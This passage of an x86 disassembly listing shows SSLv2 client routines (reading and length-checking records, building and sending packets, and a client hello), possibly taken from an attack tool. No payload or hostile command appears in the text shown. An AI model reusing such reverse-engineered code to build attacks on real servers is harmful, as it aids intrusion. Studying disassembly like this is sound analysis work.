0804a2f6 <read_ssl_packet+0x3a> call   08048e6c <_init+0x2d8>
0804a2fb <read_ssl_packet+0x3f> add    $0x10,%esp
0804a2fe <read_ssl_packet+0x42> mov    $0x0,%eax
0804a303 <read_ssl_packet+0x47> jmp    0804a53d <read_ssl_packet+0x281>

Referenced from jump at 0804a2db ; 

0804a308 <read_ssl_packet+0x4c> mov    0xc(%ebp),%eax
0804a30b <read_ssl_packet+0x4f> mov    (%eax),%al
0804a30d <read_ssl_packet+0x51> and    $0x80,%eax
0804a312 <read_ssl_packet+0x56> test   %al,%al
0804a314 <read_ssl_packet+0x58> jne    0804a35c <read_ssl_packet+0xa0>
0804a316 <read_ssl_packet+0x5a> mov    0xc(%ebp),%eax
0804a319 <read_ssl_packet+0x5d> mov    (%eax),%al
0804a31b <read_ssl_packet+0x5f> and    $0x3f,%eax
0804a31e <read_ssl_packet+0x62> movzbl %al,%eax
0804a321 <read_ssl_packet+0x65> mov    %eax,%edx
0804a323 <read_ssl_packet+0x67> shl    $0x8,%edx
0804a326 <read_ssl_packet+0x6a> mov    0xc(%ebp),%eax
0804a329 <read_ssl_packet+0x6d> inc    %eax
0804a32a <read_ssl_packet+0x6e> movzbl (%eax),%eax
0804a32d <read_ssl_packet+0x71> or     %edx,%eax
0804a32f <read_ssl_packet+0x73> mov    %eax,0xfffffffc(%ebp)
0804a332 <read_ssl_packet+0x76> sub    $0x4,%esp
0804a335 <read_ssl_packet+0x79> push   $0x1
0804a337 <read_ssl_packet+0x7b> mov    0xc(%ebp),%eax
0804a33a <read_ssl_packet+0x7e> add    $0x2,%eax
0804a33d <read_ssl_packet+0x81> push   %eax
0804a33e <read_ssl_packet+0x82> mov    0x8(%ebp),%eax
0804a341 <read_ssl_packet+0x85> pushl  (%eax)
0804a343 <read_ssl_packet+0x87> call   0804a230 <read_data>
0804a348 <read_ssl_packet+0x8c> add    $0x10,%esp
0804a34b <read_ssl_packet+0x8f> mov    0xc(%ebp),%eax
0804a34e <read_ssl_packet+0x92> add    $0x2,%eax
0804a351 <read_ssl_packet+0x95> movzbl (%eax),%eax
0804a354 <read_ssl_packet+0x98> mov    %eax,0xfffffff8(%ebp)
0804a357 <read_ssl_packet+0x9b> jmp    0804a37f <read_ssl_packet+0xc3>
0804a359 <read_ssl_packet+0x9d> lea    0x0(%esi),%esi

Referenced from jump at 0804a314 ; 

0804a35c <read_ssl_packet+0xa0> mov    0xc(%ebp),%eax
0804a35f <read_ssl_packet+0xa3> mov    (%eax),%al
0804a361 <read_ssl_packet+0xa5> and    $0x7f,%eax
0804a364 <read_ssl_packet+0xa8> movzbl %al,%eax
0804a367 <read_ssl_packet+0xab> mov    %eax,%edx
0804a369 <read_ssl_packet+0xad> shl    $0x8,%edx
0804a36c <read_ssl_packet+0xb0> mov    0xc(%ebp),%eax
0804a36f <read_ssl_packet+0xb3> inc    %eax
0804a370 <read_ssl_packet+0xb4> movzbl (%eax),%eax
0804a373 <read_ssl_packet+0xb7> or     %edx,%eax
0804a375 <read_ssl_packet+0xb9> mov    %eax,0xfffffffc(%ebp)
0804a378 <read_ssl_packet+0xbc> movl   $0x0,0xfffffff8(%ebp)

Referenced from jump at 0804a357 ; 

0804a37f <read_ssl_packet+0xc3> cmpl   $0x0,0xfffffffc(%ebp)
0804a383 <read_ssl_packet+0xc7> je     0804a390 <read_ssl_packet+0xd4>
0804a385 <read_ssl_packet+0xc9> mov    0xfffffffc(%ebp),%eax
0804a388 <read_ssl_packet+0xcc> cmp    0x10(%ebp),%eax
0804a38b <read_ssl_packet+0xcf> jg     0804a390 <read_ssl_packet+0xd4>
0804a38d <read_ssl_packet+0xd1> jmp    0804a3c0 <read_ssl_packet+0x104>
0804a38f <read_ssl_packet+0xd3> nop    

Referenced from jump at 0804a383 ; 0804a38b ; 

0804a390 <read_ssl_packet+0xd4> mov    0x8(%ebp),%eax
0804a393 <read_ssl_packet+0xd7> movl   $0x2,0x7c(%eax)
0804a39a <read_ssl_packet+0xde> sub    $0x4,%esp
0804a39d <read_ssl_packet+0xe1> pushl  0xfffffffc(%ebp)

Possible reference to string:
"read_ssl_packet: Record length out of range (rec_len = %d)"

0804a3a0 <read_ssl_packet+0xe4> push   $0x804c5e0
0804a3a5 <read_ssl_packet+0xe9> mov    0x8(%ebp),%eax
0804a3a8 <read_ssl_packet+0xec> sub    $0xffffff80,%eax
0804a3ab <read_ssl_packet+0xef> push   %eax
0804a3ac <read_ssl_packet+0xf0> call   08048e6c <_init+0x2d8>
0804a3b1 <read_ssl_packet+0xf5> add    $0x10,%esp
0804a3b4 <read_ssl_packet+0xf8> mov    $0x0,%eax
0804a3b9 <read_ssl_packet+0xfd> jmp    0804a53d <read_ssl_packet+0x281>
0804a3be <read_ssl_packet+0x102> mov    %esi,%esi

Referenced from jump at 0804a38d ; 

0804a3c0 <read_ssl_packet+0x104> sub    $0x4,%esp
0804a3c3 <read_ssl_packet+0x107> pushl  0xfffffffc(%ebp)
0804a3c6 <read_ssl_packet+0x10a> pushl  0xc(%ebp)
0804a3c9 <read_ssl_packet+0x10d> mov    0x8(%ebp),%eax
0804a3cc <read_ssl_packet+0x110> pushl  (%eax)
0804a3ce <read_ssl_packet+0x112> call   0804a230 <read_data>
0804a3d3 <read_ssl_packet+0x117> add    $0x10,%esp
0804a3d6 <read_ssl_packet+0x11a> mov    %eax,%eax
0804a3d8 <read_ssl_packet+0x11c> test   %eax,%eax
0804a3da <read_ssl_packet+0x11e> jne    0804a408 <read_ssl_packet+0x14c>
0804a3dc <read_ssl_packet+0x120> mov    0x8(%ebp),%eax
0804a3df <read_ssl_packet+0x123> movl   $0x1,0x7c(%eax)
0804a3e6 <read_ssl_packet+0x12a> sub    $0x8,%esp

Possible reference to string:
"Connection unexpectedly closed"

0804a3e9 <read_ssl_packet+0x12d> push   $0x804c5c0
0804a3ee <read_ssl_packet+0x132> mov    0x8(%ebp),%eax
0804a3f1 <read_ssl_packet+0x135> sub    $0xffffff80,%eax
0804a3f4 <read_ssl_packet+0x138> push   %eax
0804a3f5 <read_ssl_packet+0x139> call   08048e6c <_init+0x2d8>
0804a3fa <read_ssl_packet+0x13e> add    $0x10,%esp
0804a3fd <read_ssl_packet+0x141> mov    $0x0,%eax
0804a402 <read_ssl_packet+0x146> jmp    0804a53d <read_ssl_packet+0x281>
0804a407 <read_ssl_packet+0x14b> nop    

Referenced from jump at 0804a3da ; 

0804a408 <read_ssl_packet+0x14c> mov    0x8(%ebp),%eax
0804a40b <read_ssl_packet+0x14f> cmpl   $0x0,0x74(%eax)
0804a40f <read_ssl_packet+0x153> je     0804a4d1 <read_ssl_packet+0x215>
0804a415 <read_ssl_packet+0x159> mov    0xfffffff8(%ebp),%eax
0804a418 <read_ssl_packet+0x15c> add    $0x10,%eax
0804a41b <read_ssl_packet+0x15f> cmp    0xfffffffc(%ebp),%eax
0804a41e <read_ssl_packet+0x162> jl     0804a494 <read_ssl_packet+0x1d8>
0804a420 <read_ssl_packet+0x164> mov    0xc(%ebp),%eax
0804a423 <read_ssl_packet+0x167> cmpb   $0x0,(%eax)
0804a426 <read_ssl_packet+0x16a> jne    0804a464 <read_ssl_packet+0x1a8>
0804a428 <read_ssl_packet+0x16c> cmpl   $0x3,0xfffffffc(%ebp)
0804a42c <read_ssl_packet+0x170> jne    0804a464 <read_ssl_packet+0x1a8>
0804a42e <read_ssl_packet+0x172> sub    $0x8,%esp
0804a431 <read_ssl_packet+0x175> mov    0xc(%ebp),%eax
0804a434 <read_ssl_packet+0x178> inc    %eax
0804a435 <read_ssl_packet+0x179> movzwl (%eax),%eax
0804a438 <read_ssl_packet+0x17c> sub    $0x4,%esp
0804a43b <read_ssl_packet+0x17f> push   %eax
0804a43c <read_ssl_packet+0x180> call   08048cfc <_init+0x168>
0804a441 <read_ssl_packet+0x185> add    $0x8,%esp
0804a444 <read_ssl_packet+0x188> mov    %eax,%eax
0804a446 <read_ssl_packet+0x18a> mov    %eax,%eax
0804a448 <read_ssl_packet+0x18c> movzwl %ax,%eax
0804a44b <read_ssl_packet+0x18f> push   %eax
0804a44c <read_ssl_packet+0x190> pushl  0x8(%ebp)
0804a44f <read_ssl_packet+0x193> call   0804a154 <ssl_error>
0804a454 <read_ssl_packet+0x198> add    $0x10,%esp
0804a457 <read_ssl_packet+0x19b> mov    $0x0,%eax
0804a45c <read_ssl_packet+0x1a0> jmp    0804a53d <read_ssl_packet+0x281>
0804a461 <read_ssl_packet+0x1a5> lea    0x0(%esi),%esi

Referenced from jump at 0804a426 ; 0804a42c ; 

0804a464 <read_ssl_packet+0x1a8> mov    0x8(%ebp),%eax
0804a467 <read_ssl_packet+0x1ab> movl   $0x2,0x7c(%eax)
0804a46e <read_ssl_packet+0x1b2> sub    $0x4,%esp
0804a471 <read_ssl_packet+0x1b5> pushl  0xfffffffc(%ebp)

Possible reference to string:
"read_ssl_packet: Encrypted message is too short (rec_len = %d)"

0804a474 <read_ssl_packet+0x1b8> push   $0x804c620
0804a479 <read_ssl_packet+0x1bd> mov    0x8(%ebp),%eax
0804a47c <read_ssl_packet+0x1c0> sub    $0xffffff80,%eax
0804a47f <read_ssl_packet+0x1c3> push   %eax
0804a480 <read_ssl_packet+0x1c4> call   08048e6c <_init+0x2d8>
0804a485 <read_ssl_packet+0x1c9> add    $0x10,%esp
0804a488 <read_ssl_packet+0x1cc> mov    $0x0,%eax
0804a48d <read_ssl_packet+0x1d1> jmp    0804a53d <read_ssl_packet+0x281>
0804a492 <read_ssl_packet+0x1d6> mov    %esi,%esi

Referenced from jump at 0804a41e ; 

0804a494 <read_ssl_packet+0x1d8> pushl  0xc(%ebp)
0804a497 <read_ssl_packet+0x1db> pushl  0xc(%ebp)
0804a49a <read_ssl_packet+0x1de> pushl  0xfffffffc(%ebp)
0804a49d <read_ssl_packet+0x1e1> mov    0x8(%ebp),%eax
0804a4a0 <read_ssl_packet+0x1e4> pushl  0x64(%eax)
0804a4a3 <read_ssl_packet+0x1e7> call   08048cac <_init+0x118>
0804a4a8 <read_ssl_packet+0x1ec> add    $0x10,%esp
0804a4ab <read_ssl_packet+0x1ef> mov    0xfffffff8(%ebp),%edx
0804a4ae <read_ssl_packet+0x1f2> mov    0xfffffffc(%ebp),%eax
0804a4b1 <read_ssl_packet+0x1f5> sub    %edx,%eax
0804a4b3 <read_ssl_packet+0x1f7> sub    $0x10,%eax
0804a4b6 <read_ssl_packet+0x1fa> mov    %eax,0xfffffffc(%ebp)
0804a4b9 <read_ssl_packet+0x1fd> sub    $0x4,%esp
0804a4bc <read_ssl_packet+0x200> pushl  0xfffffffc(%ebp)
0804a4bf <read_ssl_packet+0x203> mov    0xc(%ebp),%eax
0804a4c2 <read_ssl_packet+0x206> add    $0x10,%eax
0804a4c5 <read_ssl_packet+0x209> push   %eax
0804a4c6 <read_ssl_packet+0x20a> pushl  0xc(%ebp)
0804a4c9 <read_ssl_packet+0x20d> call   08048c9c <_init+0x108>
0804a4ce <read_ssl_packet+0x212> add    $0x10,%esp

Referenced from jump at 0804a40f ; 

0804a4d1 <read_ssl_packet+0x215> mov    0xc(%ebp),%eax
0804a4d4 <read_ssl_packet+0x218> cmpb   $0x0,(%eax)
0804a4d7 <read_ssl_packet+0x21b> jne    0804a538 <read_ssl_packet+0x27c>
0804a4d9 <read_ssl_packet+0x21d> cmpl   $0x3,0xfffffffc(%ebp)
0804a4dd <read_ssl_packet+0x221> je     0804a508 <read_ssl_packet+0x24c>
0804a4df <read_ssl_packet+0x223> mov    0x8(%ebp),%eax
0804a4e2 <read_ssl_packet+0x226> movl   $0x2,0x7c(%eax)
0804a4e9 <read_ssl_packet+0x22d> sub    $0x8,%esp

Possible reference to string:
"read_ssl_packet: Malformed server error message"

0804a4ec <read_ssl_packet+0x230> push   $0x804c660
0804a4f1 <read_ssl_packet+0x235> mov    0x8(%ebp),%eax
0804a4f4 <read_ssl_packet+0x238> sub    $0xffffff80,%eax
0804a4f7 <read_ssl_packet+0x23b> push   %eax
0804a4f8 <read_ssl_packet+0x23c> call   08048e6c <_init+0x2d8>
0804a4fd <read_ssl_packet+0x241> add    $0x10,%esp
0804a500 <read_ssl_packet+0x244> mov    $0x0,%eax
0804a505 <read_ssl_packet+0x249> jmp    0804a53d <read_ssl_packet+0x281>
0804a507 <read_ssl_packet+0x24b> nop    

Referenced from jump at 0804a4dd ; 

0804a508 <read_ssl_packet+0x24c> sub    $0x8,%esp
0804a50b <read_ssl_packet+0x24f> mov    0xc(%ebp),%eax
0804a50e <read_ssl_packet+0x252> inc    %eax
0804a50f <read_ssl_packet+0x253> movzwl (%eax),%eax
0804a512 <read_ssl_packet+0x256> sub    $0x4,%esp
0804a515 <read_ssl_packet+0x259> push   %eax
0804a516 <read_ssl_packet+0x25a> call   08048cfc <_init+0x168>
0804a51b <read_ssl_packet+0x25f> add    $0x8,%esp
0804a51e <read_ssl_packet+0x262> mov    %eax,%eax
0804a520 <read_ssl_packet+0x264> mov    %eax,%eax
0804a522 <read_ssl_packet+0x266> movzwl %ax,%eax
0804a525 <read_ssl_packet+0x269> push   %eax
0804a526 <read_ssl_packet+0x26a> pushl  0x8(%ebp)
0804a529 <read_ssl_packet+0x26d> call   0804a154 <ssl_error>
0804a52e <read_ssl_packet+0x272> add    $0x10,%esp
0804a531 <read_ssl_packet+0x275> mov    $0x0,%eax
0804a536 <read_ssl_packet+0x27a> jmp    0804a53d <read_ssl_packet+0x281>

Referenced from jump at 0804a4d7 ; 

0804a538 <read_ssl_packet+0x27c> mov    0xfffffffc(%ebp),%eax
0804a53b <read_ssl_packet+0x27f> mov    %eax,%eax

Referenced from jump at 0804a303 ; 0804a3b9 ; 0804a402 ; 0804a45c ; 0804a48d ; 0804a505 ; 0804a536 ; 

0804a53d <read_ssl_packet+0x281> leave  
0804a53e <read_ssl_packet+0x282> ret    
0804a53f <read_ssl_packet+0x283> nop    

---- Function : send_ssl_packet ----

Referenced from call at 0804a801 ; 0804aeb3 ; 0804b23d ; 

0804a540 <send_ssl_packet> push   %ebp
0804a541 <send_ssl_packet+0x1> mov    %esp,%ebp
0804a543 <send_ssl_packet+0x3> sub    $0x4088,%esp
0804a549 <send_ssl_packet+0x9> mov    0x8(%ebp),%eax
0804a54c <send_ssl_packet+0xc> cmpl   $0x0,0x74(%eax)
0804a550 <send_ssl_packet+0x10> je     0804a560 <send_ssl_packet+0x20>
0804a552 <send_ssl_packet+0x12> mov    0x10(%ebp),%eax
0804a555 <send_ssl_packet+0x15> add    $0x10,%eax
0804a558 <send_ssl_packet+0x18> mov    %eax,0xffffbff0(%ebp)
0804a55e <send_ssl_packet+0x1e> jmp    0804a569 <send_ssl_packet+0x29>

Referenced from jump at 0804a550 ; 

0804a560 <send_ssl_packet+0x20> mov    0x10(%ebp),%eax
0804a563 <send_ssl_packet+0x23> mov    %eax,0xffffbff0(%ebp)

Referenced from jump at 0804a55e ; 

0804a569 <send_ssl_packet+0x29> mov    0xffffbff0(%ebp),%eax
0804a56f <send_ssl_packet+0x2f> add    $0x2,%eax
0804a572 <send_ssl_packet+0x32> cmp    $0x4000,%eax
0804a577 <send_ssl_packet+0x37> jle    0804a598 <send_ssl_packet+0x58>
0804a579 <send_ssl_packet+0x39> sub    $0x8,%esp
0804a57c <send_ssl_packet+0x3c> pushl  0x10(%ebp)

Possible reference to string:
"send_ssl_packet: Record length out of range (rec_len = %d)"

0804a57f <send_ssl_packet+0x3f> push   $0x804c6a0
0804a584 <send_ssl_packet+0x44> call   08048d8c <_init+0x1f8>
0804a589 <send_ssl_packet+0x49> add    $0x10,%esp
0804a58c <send_ssl_packet+0x4c> sub    $0xc,%esp
0804a58f <send_ssl_packet+0x4f> push   $0x1
0804a591 <send_ssl_packet+0x51> call   08048dfc <_init+0x268>
0804a596 <send_ssl_packet+0x56> mov    %esi,%esi

Referenced from jump at 0804a577 ; 

0804a598 <send_ssl_packet+0x58> lea    0xffffbff8(%ebp),%eax
0804a59e <send_ssl_packet+0x5e> mov    %eax,0xffffbff4(%ebp)
0804a5a4 <send_ssl_packet+0x64> mov    0xffffbff4(%ebp),%edx
0804a5aa <send_ssl_packet+0x6a> mov    0xffffbff0(%ebp),%eax
0804a5b0 <send_ssl_packet+0x70> sar    $0x8,%eax
0804a5b3 <send_ssl_packet+0x73> and    $0xffffffff,%eax
0804a5b6 <send_ssl_packet+0x76> mov    %al,(%edx)
0804a5b8 <send_ssl_packet+0x78> mov    0xffffbff4(%ebp),%edx
0804a5be <send_ssl_packet+0x7e> inc    %edx
0804a5bf <send_ssl_packet+0x7f> mov    0xffffbff0(%ebp),%al
0804a5c5 <send_ssl_packet+0x85> and    $0xffffffff,%eax
0804a5c8 <send_ssl_packet+0x88> mov    %al,(%edx)
0804a5ca <send_ssl_packet+0x8a> lea    0xffffbff4(%ebp),%eax
0804a5d0 <send_ssl_packet+0x90> addl   $0x2,(%eax)
0804a5d3 <send_ssl_packet+0x93> lea    0xffffbff8(%ebp),%eax
0804a5d9 <send_ssl_packet+0x99> orb    $0x80,(%eax)
0804a5dc <send_ssl_packet+0x9c> mov    0x8(%ebp),%eax
0804a5df <send_ssl_packet+0x9f> cmpl   $0x0,0x74(%eax)
0804a5e3 <send_ssl_packet+0xa3> je     0804a6c4 <send_ssl_packet+0x184>
0804a5e9 <send_ssl_packet+0xa9> mov    0x8(%ebp),%eax
0804a5ec <send_ssl_packet+0xac> sub    $0xc,%esp
0804a5ef <send_ssl_packet+0xaf> pushl  0x70(%eax)
0804a5f2 <send_ssl_packet+0xb2> call   08048bcc <_init+0x38>
0804a5f7 <send_ssl_packet+0xb7> add    $0x10,%esp
0804a5fa <send_ssl_packet+0xba> mov    %eax,%eax
0804a5fc <send_ssl_packet+0xbc> mov    %eax,0xffffbf84(%ebp)
0804a602 <send_ssl_packet+0xc2> sub    $0xc,%esp
0804a605 <send_ssl_packet+0xc5> lea    0xffffbf88(%ebp),%eax
0804a60b <send_ssl_packet+0xcb> push   %eax
0804a60c <send_ssl_packet+0xcc> call   08048cec <_init+0x158>
0804a611 <send_ssl_packet+0xd1> add    $0x10,%esp
0804a614 <send_ssl_packet+0xd4> sub    $0x4,%esp
0804a617 <send_ssl_packet+0xd7> push   $0x10
0804a619 <send_ssl_packet+0xd9> mov    0x8(%ebp),%eax
0804a61c <send_ssl_packet+0xdc> pushl  0x60(%eax)
0804a61f <send_ssl_packet+0xdf> lea    0xffffbf88(%ebp),%eax
0804a625 <send_ssl_packet+0xe5> push   %eax
0804a626 <send_ssl_packet+0xe6> call   08048eac <_init+0x318>
0804a62b <send_ssl_packet+0xeb> add    $0x10,%esp
0804a62e <send_ssl_packet+0xee> sub    $0x4,%esp
0804a631 <send_ssl_packet+0xf1> pushl  0x10(%ebp)
0804a634 <send_ssl_packet+0xf4> pushl  0xc(%ebp)
0804a637 <send_ssl_packet+0xf7> lea    0xffffbf88(%ebp),%eax
0804a63d <send_ssl_packet+0xfd> push   %eax
0804a63e <send_ssl_packet+0xfe> call   08048eac <_init+0x318>
0804a643 <send_ssl_packet+0x103> add    $0x10,%esp
0804a646 <send_ssl_packet+0x106> sub    $0x4,%esp
0804a649 <send_ssl_packet+0x109> push   $0x4
0804a64b <send_ssl_packet+0x10b> lea    0xffffbf84(%ebp),%eax
0804a651 <send_ssl_packet+0x111> push   %eax
0804a652 <send_ssl_packet+0x112> lea    0xffffbf88(%ebp),%eax
0804a658 <send_ssl_packet+0x118> push   %eax
0804a659 <send_ssl_packet+0x119> call   08048eac <_init+0x318>
0804a65e <send_ssl_packet+0x11e> add    $0x10,%esp
0804a661 <send_ssl_packet+0x121> sub    $0x8,%esp
0804a664 <send_ssl_packet+0x124> lea    0xffffbf88(%ebp),%eax
0804a66a <send_ssl_packet+0x12a> push   %eax
0804a66b <send_ssl_packet+0x12b> pushl  0xffffbff4(%ebp)
0804a671 <send_ssl_packet+0x131> call   08048d4c <_init+0x1b8>
0804a676 <send_ssl_packet+0x136> add    $0x10,%esp
0804a679 <send_ssl_packet+0x139> lea    0xffffbff4(%ebp),%eax
0804a67f <send_ssl_packet+0x13f> addl   $0x10,(%eax)
0804a682 <send_ssl_packet+0x142> sub    $0x4,%esp
0804a685 <send_ssl_packet+0x145> pushl  0x10(%ebp)
0804a688 <send_ssl_packet+0x148> pushl  0xc(%ebp)
0804a68b <send_ssl_packet+0x14b> pushl  0xffffbff4(%ebp)
0804a691 <send_ssl_packet+0x151> call   08048d9c <_init+0x208>
0804a696 <send_ssl_packet+0x156> add    $0x10,%esp
0804a699 <send_ssl_packet+0x159> lea    0xffffbff8(%ebp),%eax
0804a69f <send_ssl_packet+0x15f> add    $0x2,%eax
0804a6a2 <send_ssl_packet+0x162> push   %eax
0804a6a3 <send_ssl_packet+0x163> lea    0xffffbff8(%ebp),%eax
0804a6a9 <send_ssl_packet+0x169> add    $0x2,%eax
0804a6ac <send_ssl_packet+0x16c> push   %eax
0804a6ad <send_ssl_packet+0x16d> pushl  0xffffbff0(%ebp)
0804a6b3 <send_ssl_packet+0x173> mov    0x8(%ebp),%eax
0804a6b6 <send_ssl_packet+0x176> pushl  0x68(%eax)
0804a6b9 <send_ssl_packet+0x179> call   08048cac <_init+0x118>
0804a6be <send_ssl_packet+0x17e> add    $0x10,%esp
0804a6c1 <send_ssl_packet+0x181> jmp    0804a6db <send_ssl_packet+0x19b>
0804a6c3 <send_ssl_packet+0x183> nop    

Referenced from jump at 0804a5e3 ; 

0804a6c4 <send_ssl_packet+0x184> sub    $0x4,%esp
0804a6c7 <send_ssl_packet+0x187> pushl  0x10(%ebp)
0804a6ca <send_ssl_packet+0x18a> pushl  0xc(%ebp)
0804a6cd <send_ssl_packet+0x18d> pushl  0xffffbff4(%ebp)
0804a6d3 <send_ssl_packet+0x193> call   08048d9c <_init+0x208>
0804a6d8 <send_ssl_packet+0x198> add    $0x10,%esp

Referenced from jump at 0804a6c1 ; 

0804a6db <send_ssl_packet+0x19b> push   $0x0
0804a6dd <send_ssl_packet+0x19d> mov    0xffffbff0(%ebp),%eax
0804a6e3 <send_ssl_packet+0x1a3> add    $0x2,%eax
0804a6e6 <send_ssl_packet+0x1a6> push   %eax
0804a6e7 <send_ssl_packet+0x1a7> lea    0xffffbff8(%ebp),%eax
0804a6ed <send_ssl_packet+0x1ad> push   %eax
0804a6ee <send_ssl_packet+0x1ae> mov    0x8(%ebp),%eax
0804a6f1 <send_ssl_packet+0x1b1> pushl  (%eax)
0804a6f3 <send_ssl_packet+0x1b3> call   08048e3c <_init+0x2a8>
0804a6f8 <send_ssl_packet+0x1b8> add    $0x10,%esp
0804a6fb <send_ssl_packet+0x1bb> mov    %eax,%eax
0804a6fd <send_ssl_packet+0x1bd> cmp    $0xffffffff,%eax
0804a700 <send_ssl_packet+0x1c0> jne    0804a73c <send_ssl_packet+0x1fc>
0804a702 <send_ssl_packet+0x1c2> sub    $0x8,%esp
0804a705 <send_ssl_packet+0x1c5> sub    $0x4,%esp
0804a708 <send_ssl_packet+0x1c8> sub    $0x4,%esp
0804a70b <send_ssl_packet+0x1cb> call   08048c6c <_init+0xd8>
0804a710 <send_ssl_packet+0x1d0> add    $0x4,%esp
0804a713 <send_ssl_packet+0x1d3> mov    %eax,%eax
0804a715 <send_ssl_packet+0x1d5> mov    %eax,%eax
0804a717 <send_ssl_packet+0x1d7> pushl  (%eax)
0804a719 <send_ssl_packet+0x1d9> call   08048c3c <_init+0xa8>
0804a71e <send_ssl_packet+0x1de> add    $0x8,%esp
0804a721 <send_ssl_packet+0x1e1> mov    %eax,%eax
0804a723 <send_ssl_packet+0x1e3> push   %eax

Possible reference to string:
"Error in send: %s"

0804a724 <send_ssl_packet+0x1e4> push   $0x804c6dc
0804a729 <send_ssl_packet+0x1e9> call   08048d8c <_init+0x1f8>
0804a72e <send_ssl_packet+0x1ee> add    $0x10,%esp
0804a731 <send_ssl_packet+0x1f1> sub    $0xc,%esp
0804a734 <send_ssl_packet+0x1f4> push   $0x1
0804a736 <send_ssl_packet+0x1f6> call   08048dfc <_init+0x268>
0804a73b <send_ssl_packet+0x1fb> nop    

Referenced from jump at 0804a700 ; 

0804a73c <send_ssl_packet+0x1fc> mov    0x8(%ebp),%eax
0804a73f <send_ssl_packet+0x1ff> incl   0x70(%eax)
0804a742 <send_ssl_packet+0x202> leave  
0804a743 <send_ssl_packet+0x203> ret    

---- Function : send_client_hello ----

Referenced from call at 0804931b ; 08049450 ; 

0804a744 <send_client_hello> push   %ebp
0804a745 <send_client_hello+0x1> mov    %esp,%ebp
0804a747 <send_client_hello+0x3> push   %edi
0804a748 <send_client_hello+0x4> push   %esi
0804a749 <send_client_hello+0x5> push   %ebx
0804a74a <send_client_hello+0x6> sub    $0x401c,%esp
0804a750 <send_client_hello+0xc> lea    0xffffbfd8(%ebp),%edi

Possible reference to string:
"
"

0804a756 <send_client_hello+0x12> mov    $0x804c700,%esi
0804a75b <send_client_hello+0x17> cld    
0804a75c <send_client_hello+0x18> mov    $0x22,%ecx
0804a761 <send_client_hello+0x1d> repz movsb %ds:(%esi),%es:(%edi)
0804a763 <send_client_hello+0x1f> lea    0xffffbffa(%ebp),%edi
0804a769 <send_client_hello+0x25> cld    
0804a76a <send_client_hello+0x26> mov    $0x3fde,%ecx
0804a76f <send_client_hello+0x2b> mov    $0x0,%al
0804a771 <send_client_hello+0x2d> repz stos %al,%es:(%edi)
0804a773 <send_client_hello+0x2f> mov    0x8(%ebp),%eax
0804a776 <send_client_hello+0x32> cmpl   $0x0,0x7c(%eax)
0804a77a <send_client_hello+0x36> je     0804a788 <send_client_hello+0x44>
0804a77c <send_client_hello+0x38> mov    $0x0,%eax
0804a781 <send_client_hello+0x3d> jmp    0804a80e <send_client_hello+0xca>
0804a786 <send_client_hello+0x42> mov    %esi,%esi

Referenced from jump at 0804a77a ; 

0804a788 <send_client_hello+0x44> mov    0x8(%ebp),%eax
0804a78b <send_client_hello+0x47> cmpl   $0x0,0x78(%eax)
0804a78f <send_client_hello+0x4b> je     0804a7a1 <send_client_hello+0x5d>
0804a791 <send_client_hello+0x4d> sub    $0xc,%esp

Possible reference to string:
" -> send_client_hello"

0804a794 <send_client_hello+0x50> push   $0x804c722
0804a799 <send_client_hello+0x55> call   08048d8c <_init+0x1f8>
0804a79e <send_client_hello+0x5a> add    $0x10,%esp

Referenced from jump at 0804a78f ; 

0804a7a1 <send_client_hello+0x5d> movl   $0x0,0xffffffe4(%ebp)

Referenced from jump at 0804a7cf ; 

0804a7a8 <send_client_hello+0x64> cmpl   $0xf,0xffffffe4(%ebp)
0804a7ac <send_client_hello+0x68> jle    0804a7b0 <send_client_hello+0x6c>
0804a7ae <send_client_hello+0x6a> jmp    0804a7d4 <send_client_hello+0x90>

Referenced from jump at 0804a7ac ; 

0804a7b0 <send_client_hello+0x6c> call   08048e9c <_init+0x308>
0804a7b5 <send_client_hello+0x71> mov    %eax,%ebx
0804a7b7 <send_client_hello+0x73> mov    0x8(%ebp),%eax
0804a7ba <send_client_hello+0x76> add    $0x4,%eax
0804a7bd <send_client_hello+0x79> mov    %eax,%ecx
0804a7bf <send_client_hello+0x7b> mov    0xffffffe4(%ebp),%edx
0804a7c2 <send_client_hello+0x7e> mov    %ebx,%eax
0804a7c4 <send_client_hello+0x80> sar    $0x18,%eax
0804a7c7 <send_client_hello+0x83> mov    %al,(%edx,%ecx,1)
0804a7ca <send_client_hello+0x86> lea    0xffffffe4(%ebp),%eax
0804a7cd <send_client_hello+0x89> incl   (%eax)
0804a7cf <send_client_hello+0x8b> jmp    0804a7a8 <send_client_hello+0x64>
0804a7d1 <send_client_hello+0x8d> lea    0x0(%esi),%esi

Referenced from jump at 0804a7ae ; 

0804a7d4 <send_client_hello+0x90> sub    $0x4,%esp
0804a7d7 <send_client_hello+0x93> push   $0x10
0804a7d9 <send_client_hello+0x95> mov    0x8(%ebp),%eax
0804a7dc <send_client_hello+0x98> add    $0x4,%eax
0804a7df <send_client_hello+0x9b> push   %eax
0804a7e0 <send_client_hello+0x9c> lea    0xffffbfd8(%ebp),%eax
0804a7e6 <send_client_hello+0xa2> add    $0x21,%eax
0804a7e9 <send_client_hello+0xa5> push   %eax
0804a7ea <send_client_hello+0xa6> call   08048d9c <_init+0x208>
0804a7ef <send_client_hello+0xab> add    $0x10,%esp
0804a7f2 <send_client_hello+0xae> sub    $0x4,%esp
0804a7f5 <send_client_hello+0xb1> push   $0x31
0804a7f7 <send_client_hello+0xb3> lea    0xffffbfd8(%ebp),%eax
0804a7fd <send_client_hello+0xb9> push   %eax
0804a7fe <send_client_hello+0xba> pushl  0x8(%ebp)
0804a801 <send_client_hello+0xbd> call   0804a540 <send_ssl_packet>
0804a806 <send_client_hello+0xc2> add    $0x10,%esp
0804a809 <send_client_hello+0xc5> mov    $0x1,%eax

Referenced from jump at 0804a781 ; 

0804a80e <send_client_hello+0xca> lea    0xfffffff4(%ebp),%esp
0804a811 <send_client_hello+0xcd> pop    %ebx
0804a812 <send_client_hello+0xce> pop    %esi
0804a813 <send_client_hello+0xcf> pop    %edi
0804a814 <send_client_hello+0xd0> pop    %ebp
0804a815 <send_client_hello+0xd1> ret    
0804a816 <send_client_hello+0xd2> mov    %esi,%esi

---- Function : get_server_hello ----

Referenced from call at 08049329 ; 0804945e ; 

0804a818 <get_server_hello> push   %ebp
0804a819 <get_server_hello+0x1> mov    %esp,%ebp
0804a81b <get_server_hello+0x3> sub    $0x4038,%esp
0804a821 <get_server_hello+0x9> mov    0x8(%ebp),%eax
0804a824 <get_server_hello+0xc> cmpl   $0x0,0x7c(%eax)
0804a828 <get_server_hello+0x10> je     0804a834 <get_server_hello+0x1c>
0804a82a <get_server_hello+0x12> mov    $0x0,%eax
0804a82f <get_server_hello+0x17> jmp    0804ac67 <get_server_hello+0x44f>

